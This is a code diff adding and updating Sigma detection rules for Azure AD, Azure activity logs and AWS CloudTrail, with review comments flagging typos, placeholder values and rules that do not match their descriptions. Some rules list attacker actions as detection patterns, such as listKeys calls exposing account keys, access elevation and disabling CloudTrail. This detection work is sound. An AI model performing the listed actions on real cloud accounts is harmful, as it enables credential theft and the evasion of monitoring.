+ - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'noMfaOnRoleActivationAlertIncident' + condition: selection +falsepositives: + - Investigate if user is performing MFA at sign-in. +level: high 
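Review bot: In azure_pim_role_frequent_activation.yml the falsepositives line `Investigate where if active time period for a role is set too short.` is garbled; suggest `- Investigate whether the active time period configured for the role is too short.` In azure_pim_role_no_mfa_required.yml, `mfa` in the description should be written `MFA` to match the title.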
diff --git a/src/main/resources/rules/azure/azure_pim_role_not_used.yml b/src/main/resources/rules/azure/azure_pim_role_not_used.yml new file mode 100644 index 000000000..cc1cd00d1 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_not_used.yml @@ -0,0 +1,22 @@ +title: Roles Are Not Being Used +id: 8c6ec464-4ae4-43ac-936a-291da66ed13d +status: experimental +description: Identifies when a user has been assigned a privilege role and are not using that role. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'redundantAssignmentAlertIncident' + condition: selection +falsepositives: + - Investigate if potential generic account that cannot be removed. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml b/src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml new file mode 100644 index 000000000..dd24c9ab2 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml 
@@ -0,0 +1,22 @@ +title: Too Many Global Admins +id: 7bbc309f-e2b1-4eb1-8369-131a367d67d3 +status: experimental +description: Identifies an event where there are there are too many accounts assigned the Global Administrator role. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'tooManyGlobalAdminsAssignedToTenantAlertIncident' + condition: selection +falsepositives: + - Investigate if threshold setting in PIM is too low. +level: high diff --git a/src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml b/src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml new file mode 100644 index 000000000..780beedfb --- /dev/null +++ b/src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml @@ -0,0 +1,24 @@ +title: User Added To Privilege Role +id: 49a268a4-72f4-4e38-8a7b-885be690c5b5 +status: test +description: Detects when a user is added to a privileged role. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/06 +tags: + - attack.privilege_escalation + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Add eligible member (permanent) + - Add eligible member (eligible) + condition: selection +falsepositives: + - Legtimate administrator actions of adding members from a role +level: high 
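Review bot: The description of azure_pim_too_many_global_admins.yml repeats words: `Identifies an event where there are there are too many accounts assigned the Global Administrator role.` Suggest `description: Identifies an event where too many accounts are assigned the Global Administrator role.`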
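Review bot: In azure_priviledged_role_assignment_add.yml the falsepositives line `Legtimate administrator actions of adding members from a role` has a typo and the wrong preposition; suggest `- Legitimate administrator actions of adding members to a role`. The same `Legtimate` typo is in azure_priviledged_role_assignment_bulk_change.yml that follows, where `removing members from a role` is otherwise correct. The title `User Added To Privilege Role` would also read better as `User Added To Privileged Role`, matching the description.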
diff --git a/src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml b/src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml new file mode 100644 index 000000000..8665f1ebc --- /dev/null +++ b/src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml @@ -0,0 +1,23 @@ +title: Bulk Deletion Changes To Privileged Account Permissions +id: 102e11e3-2db5-4c9e-bc26-357d42585d21 +status: test +description: Detects when a user is removed from a privileged role. Bulk changes should be investigated. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/05 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Remove eligible member (permanent) + - Remove eligible member (eligible) + condition: selection +falsepositives: + - Legtimate administrator actions of removing members from a role +level: high diff --git a/src/main/resources/rules/azure/azure_privileged_account_creation.yml b/src/main/resources/rules/azure/azure_privileged_account_creation.yml new file mode 100644 index 000000000..7dae3cfd0 --- /dev/null +++ b/src/main/resources/rules/azure/azure_privileged_account_creation.yml 
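Review bot: The title `Bulk Deletion Changes To Privileged Account Permissions` and the description's `Bulk changes should be investigated` promise an aggregate detection, but the selection matches each single `Remove eligible member` event with no count and no time window, so every individual removal fires at `level: high`. Either rename the rule to describe what it matches (a single removal of a member from a privileged role) or implement the bulk aspect with a count aggregation or correlation over a short window, and keep title, description and level consistent with whichever is chosen.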
@@ -0,0 +1,26 @@ +title: Privileged Account Creation +id: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947 +status: test +description: Detects when a new admin is created. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton +date: 2022/08/11 +modified: 2022/08/16 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message|contains|all: + - Add user + - Add member to role + Status: Success + condition: selection +falsepositives: + - A legitimate new admin account being created +level: medium diff --git a/src/main/resources/rules/azure/azure_rare_operations.yml b/src/main/resources/rules/azure/azure_rare_operations.yml index 169ae1b53..f7776cf79 100644 --- a/src/main/resources/rules/azure/azure_rare_operations.yml +++ b/src/main/resources/rules/azure/azure_rare_operations.yml 
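Review bot: `properties.message|contains|all` requires both `Add user` and `Add member to role` to appear in the message of a single event. If, as the activity names suggest, user creation and role assignment are logged as two separate audit entries, this selection can never match and the rule is silent rather than noisy; please verify against a real event before merging. If they are separate events, the detection needs either two selections tied together by a correlation over a time window, or a split into two rules each with its own level.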
@@ -2,26 +2,26 @@ title: Rare Subscription-level Operations In Azure id: c1182e02-49a3-481c-b3de-0fadc4091488 status: test description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. -author: sawwinnnaung references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/RareOperations.yaml + - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml +author: sawwinnnaung date: 2020/05/07 -modified: 2021/11/27 +modified: 2023/10/11 +tags: + - attack.t1003 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - keywords: - - Microsoft.DocumentDB/databaseAccounts/listKeys/action - - Microsoft.Maps/accounts/listKeys/action - - Microsoft.Media/mediaservices/listKeys/action - - Microsoft.CognitiveServices/accounts/listKeys/action - - Microsoft.Storage/storageAccounts/listKeys/action - - Microsoft.Compute/snapshots/write - - Microsoft.Network/networkSecurityGroups/write - condition: keywords + keywords: + - Microsoft.DocumentDB/databaseAccounts/listKeys/action + - Microsoft.Maps/accounts/listKeys/action + - Microsoft.Media/mediaservices/listKeys/action + - Microsoft.CognitiveServices/accounts/listKeys/action + - Microsoft.Storage/storageAccounts/listKeys/action + - Microsoft.Compute/snapshots/write + - Microsoft.Network/networkSecurityGroups/write + condition: keywords falsepositives: - - Valid change + - Valid change level: medium -tags: - - attack.t1003 diff --git a/src/main/resources/rules/azure/azure_service_principal_created.yml b/src/main/resources/rules/azure/azure_service_principal_created.yml index 46a14b711..c0133ca46 100644 --- a/src/main/resources/rules/azure/azure_service_principal_created.yml +++ b/src/main/resources/rules/azure/azure_service_principal_created.yml 
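Review bot: The description `Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used` does not describe this detection: the keywords list matches every `listKeys`, snapshot write and network-security-group write operation, with no source-IP baseline and no notion of rarity, so the rule fires on each such call. The referenced Sentinel query name (RareOperations) suggests the original compares operations against a baseline, which a plain keyword match cannot express, so the description should state what the Sigma rule actually does, e.g. `description: Detects subscription-level operations that expose account keys (listKeys) or modify snapshots and network security groups; these are uncommon in most environments and should be reviewed.` The `attack.t1003` tag (OS Credential Dumping) is also a stretch for `listKeys` on storage or service accounts; `attack.credential_access` with `attack.t1552` (Unsecured Credentials) looks like a closer mapping, worth checking.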
@@ -1,22 +1,23 @@ title: Azure Service Principal Created id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 +status: test description: Identifies when a service principal is created in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/02 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/02 +modified: 2022/10/09 +tags: + - attack.defense_evasion logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: 'Add service principal' condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Service principal being created may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service principal being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_service_principal_removed.yml b/src/main/resources/rules/azure/azure_service_principal_removed.yml index 43328012b..9fb6f81f0 100644 --- a/src/main/resources/rules/azure/azure_service_principal_removed.yml +++ b/src/main/resources/rules/azure/azure_service_principal_removed.yml 
@@ -1,22 +1,23 @@ title: Azure Service Principal Removed id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 +status: test description: Identifies when a service principal was removed in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.defense_evasion logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: Remove service principal condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Service principal being removed may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service principal being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml index 37c184fd9..3ec76e2dd 100644 --- a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml +++ b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml 
@@ -1,21 +1,25 @@ title: Azure Subscription Permission Elevation Via ActivityLogs id: 09438caa-07b1-4870-8405-1dbafe3dad95 -status: experimental +status: test +description: | + Detects when a user has been elevated to manage all Azure Subscriptions. + This change should be investigated immediately if it isn't planned. + This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization author: Austin Songer @austinsonger date: 2021/11/26 -description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization +modified: 2022/08/23 +tags: + - attack.initial_access + - attack.t1078.004 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: - selection1: - properties.message: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION - condition: selection1 -level: high + selection: + operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION + condition: selection falsepositives: - - If this was approved by System Administrator. -tags: - - attack.initial_access - - attack.t1078 + - If this was approved by System Administrator. +level: high diff --git a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml index a566a107b..d8cb0ec13 100644 --- a/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml +++ b/src/main/resources/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml 
@@ -1,22 +1,26 @@ title: Azure Subscription Permission Elevation Via AuditLogs id: ca9bf243-465e-494a-9e54-bf9fc239057d -status: experimental +status: test +description: | + Detects when a user has been elevated to manage all Azure Subscriptions. + This change should be investigated immediately if it isn't planned. + This setting could allow an attacker access to Azure subscriptions in your environment. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation author: Austin Songer @austinsonger date: 2021/11/26 -description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment. -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation +modified: 2022/12/25 +tags: + - attack.initial_access + - attack.t1078 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - Category: 'Administrative' - OperationName: 'Assigns the caller to user access admin' - condition: selection -level: high + selection: + Category: 'Administrative' + OperationName: 'Assigns the caller to user access admin' + condition: selection falsepositives: - - If this was approved by System Administrator. -tags: - - attack.initial_access - - attack.t1078 + - If this was approved by System Administrator. +level: high diff --git a/src/main/resources/rules/azure/azure_suppression_rule_created.yml b/src/main/resources/rules/azure/azure_suppression_rule_created.yml index 7c079c960..437a5ef5b 100644 --- a/src/main/resources/rules/azure/azure_suppression_rule_created.yml +++ b/src/main/resources/rules/azure/azure_suppression_rule_created.yml 
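Review bot: This auditlogs rule matches on `OperationName` (capital O) while the activity-log rules in this commit, including the ActivityLogs sibling just above, were normalized to `operationName`. Field names are matched as written by the backend mapping, so if both services share one mapping one of the two spellings will not match; if the audit-log schema really exposes `OperationName`, a short comment such as `# field is OperationName in the AAD audit log schema, unlike operationName in activity logs` would keep the next maintainer from "fixing" it. Also, the ActivityLogs sibling was moved to `attack.t1078.004` (Cloud Accounts) while this rule keeps `attack.t1078`; the two detect the same elevation and should carry the same mapping.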
@@ -1,22 +1,23 @@ title: Azure Suppression Rule Created id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 +status: test description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE + operationName: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Suppression Rule being created may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Suppression Rule being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_tap_added.yml b/src/main/resources/rules/azure/azure_tap_added.yml new file mode 100644 index 000000000..726f36e60 --- /dev/null +++ b/src/main/resources/rules/azure/azure_tap_added.yml 
@@ -0,0 +1,22 @@ +title: Temporary Access Pass Added To An Account +id: fa84aaf5-8142-43cd-9ec2-78cfebf878ce +status: test +description: Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/10 +tags: + - attack.persistence + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Admin registered security info + Status: Admin registered temporary access pass method for user + condition: selection +falsepositives: + - Administrator adding a legitimate temporary access pass +level: high diff --git a/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml b/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml index 18691dfd3..5043451b2 100644 --- a/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml +++ b/src/main/resources/rules/azure/azure_unusual_authentication_interruption.yml 
@@ -1,28 +1,29 @@ title: Azure Unusual Authentication Interruption id: 8366030e-7216-476b-9927-271d79f13cf3 -status: experimental -author: Austin Songer @austinsonger -date: 2021/11/26 +status: test description: Detects when there is a interruption in the authentication process. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Austin Songer @austinsonger +date: 2021/11/26 +modified: 2022/12/18 +tags: + - attack.initial_access + - attack.t1078 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection1: - ResultType: 50097 - ResultDescription: 'Device authentication is required' - selection2: - ResultType: 50155 - ResultDescription: 'DeviceAuthenticationFailed' - selection3: - ResultType: 50158 - ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' - condition: selection1 or selection2 or selection3 -level: medium + selection_50097: + ResultType: 50097 + ResultDescription: 'Device authentication is required' + selection_50155: + ResultType: 50155 + ResultDescription: 'DeviceAuthenticationFailed' + selection_50158: + ResultType: 50158 + ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied' + condition: 1 of selection_* falsepositives: - - Unknown -tags: - - attack.initial_access - - attack.t1078 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml b/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml index 5c087a6ee..059d1abe3 100644 --- a/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml +++ b/src/main/resources/rules/azure/azure_user_login_blocked_by_conditional_access.yml 
@@ -1,21 +1,26 @@ title: User Access Blocked by Azure Conditional Access id: 9a60e676-26ac-44c3-814b-0c2a8b977adf -status: experimental +status: test +description: | + Detect access has been blocked by Conditional Access policies. + The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts author: AlertIQ date: 2021/10/10 -description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts. -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +modified: 2022/12/25 +tags: + - attack.credential_access + - attack.initial_access + - attack.t1110 + - attack.t1078.004 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 53003 - condition: selection -level: medium + selection: + ResultType: 53003 + condition: selection falsepositives: - - Unknown -tags: - - attack.credential_access - - attack.t1110 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_user_password_change.yml b/src/main/resources/rules/azure/azure_user_password_change.yml new file mode 100644 index 000000000..650434073 --- /dev/null +++ b/src/main/resources/rules/azure/azure_user_password_change.yml 
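Review bot: The new multi-line description still carries the garbled wording from the old single-line form, `which might be sights≈ of unauthorizeed login to valid accounts`, and the stray `≈` character plus the misspelling will be copied into every SIEM that renders rule descriptions. Suggested second line: `  The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.`; the first line would also read better as `Detects access that has been blocked by Conditional Access policies.`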
@@ -0,0 +1,27 @@ +title: Password Reset By User Account +id: 340ee172-4b67-4fb4-832f-f961bdc1f3aa +status: test +description: Detect when a user has reset their password in Azure AD +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: YochanaHenderson, '@Yochana-H' +date: 2022/08/03 +tags: + - attack.persistence + - attack.credential_access + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'UserManagement' + Status: 'Success' + Initiatedby: 'UPN' + filter: + Target|contains: 'UPN' + ActivityType|contains: 'Password reset' + condition: selection and filter +falsepositives: + - If this was approved by System Administrator or confirmed user action. +level: medium diff --git a/src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml b/src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml new file mode 100644 index 000000000..8dcb1141d --- /dev/null +++ b/src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml @@ -0,0 +1,24 @@ +title: Users Authenticating To Other Azure AD Tenants +id: 5f521e4b-0105-4b72-845b-2198a54487b9 +status: test +description: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins +author: MikeDuddington, '@dudders1' +date: 2022/06/30 +tags: + - attack.initial_access + - attack.t1078.004 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + HomeTenantId: 'HomeTenantID' + filter: + ResourceTenantId|contains: 'HomeTenantID' + condition: selection and not filter +falsepositives: + - If this was approved by System Administrator. +level: medium 
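Review bot: The values `'UPN'` and `'HomeTenantID'` in the two new rules on this line are literal placeholders rather than field matches, so `Initiatedby: 'UPN'`, `Target|contains: 'UPN'`, `HomeTenantId: 'HomeTenantID'` and `ResourceTenantId|contains: 'HomeTenantID'` will only match events whose fields literally contain those strings, and both rules will stay silent once deployed. Each rule needs a comment next to the selection stating that the deploying team must substitute their own tenant ID / principal name, or the selection should be rewritten as a field-to-field comparison if the target backend supports one. In the password-reset rule `condition: selection and filter` also uses `filter` as a positive match despite its name; renaming it `selection_target` would make the intent clearer.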
diff --git a/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml index 6b25808c8..fd8667d23 100644 --- a/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_virtual_network_modified_or_deleted.yml 
@@ -1,26 +1,27 @@ title: Azure Virtual Network Modified or Deleted id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f +status: test description: Identifies when a Virtual Network is modified or deleted in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message|startswith: + operationName|startswith: - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ - MICROSOFT.NETWORK/VIRTUALNETWORKS/ - properties.message|endswith: + operationName|endswith: - /WRITE - /DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml index 58d96b14e..9022ff228 100644 --- a/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml 
+++ b/src/main/resources/rules/azure/azure_vpn_connection_modified_or_deleted.yml @@ -1,23 +1,24 @@ title: Azure VPN Connection Modified or Deleted id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 +status: test description: Identifies when a VPN connection is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml b/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml index 298585fae..783dceb32 100644 --- a/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml 
+++ b/src/main/resources/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml 
@@ -1,22 +1,25 @@ title: AWS Attached Malicious Lambda Layer id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d -description: Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. -author: Austin Songer -status: experimental -date: 2021/09/23 +status: test +description: | + Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. + This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. references: - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html +author: Austin Songer +date: 2021/09/23 +modified: 2022/10/09 +tags: + - attack.privilege_escalation logsource: product: aws service: cloudtrail detection: selection: eventSource: lambda.amazonaws.com - eventName|startswith: UpdateFunctionConfiguration + eventName|startswith: 'UpdateFunctionConfiguration' condition: selection -level: medium -tags: - - attack.privilege_escalation falsepositives: - - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Layer being attached from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml b/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml index 965007fc9..eeae3dc7a 100644 --- a/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml +++ b/src/main/resources/rules/cloudtrail/aws_cloudtrail_disable_logging.yml @@ -1,12 +1,15 @@ title: AWS CloudTrail Important Change id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74 -status: experimental +status: test description: Detects disabling, deleting and updating of a Trail -author: vitaliy0x1 -date: 2020/01/21 -modified: 2021/08/09 references: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html +author: vitaliy0x1 +date: 2020/01/21 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: product: aws service: cloudtrail @@ -21,6 +24,3 @@ detection: falsepositives: - Valid change in a Trail level: medium -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml b/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml index 6a0d9e6a3..ea3d2e7b3 100644 --- a/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml +++ b/src/main/resources/rules/cloudtrail/aws_config_disable_recording.yml 
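Review bot: The selection in the Lambda-layer hunk fires on every `UpdateFunctionConfiguration*` call, while the description promises detection of a layer being attached; memory, timeout, handler and environment changes will all alert at medium severity. If your CloudTrail records carry the layer list in `requestParameters`, a line such as `      requestParameters|contains: 'layers'` (field name to be confirmed against a sample event) would narrow it to the described behaviour; otherwise the description should state that the rule covers any configuration update. The `startswith` modifier presumably exists because the logged event name carries a version suffix; a one-line comment saying so would stop a later maintainer from tightening it to an exact match.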
